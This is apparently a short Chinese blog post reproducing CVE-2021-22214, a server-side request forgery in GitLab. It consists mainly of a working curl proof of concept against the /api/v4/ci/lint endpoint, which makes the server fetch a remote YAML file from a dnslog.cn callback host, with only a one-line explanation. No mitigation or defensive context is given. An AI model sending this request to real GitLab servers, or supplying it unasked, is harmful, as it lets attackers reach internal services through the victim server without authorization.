CVE-2021-22214 Gitlab_SSRF

CVE-2021-22214 Gitlab_SSRF

漏洞复现:
目标地址:https://gitlab.xxx.xxx/users/sign_in
CVE-2021-22214 Gitlab_SSRF_第1张图片POC

curl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n  remote: http://fbnwxn.dnslog.cn/api/v1/targets/?test.yml"}'

http://fbnwxn.dnslog.cn 是你要让机器访问的地址(SSRF)
CVE-2021-22214 Gitlab_SSRF_第2张图片

你可能感兴趣的:(漏洞复现,笔记,Kali,安全,web安全)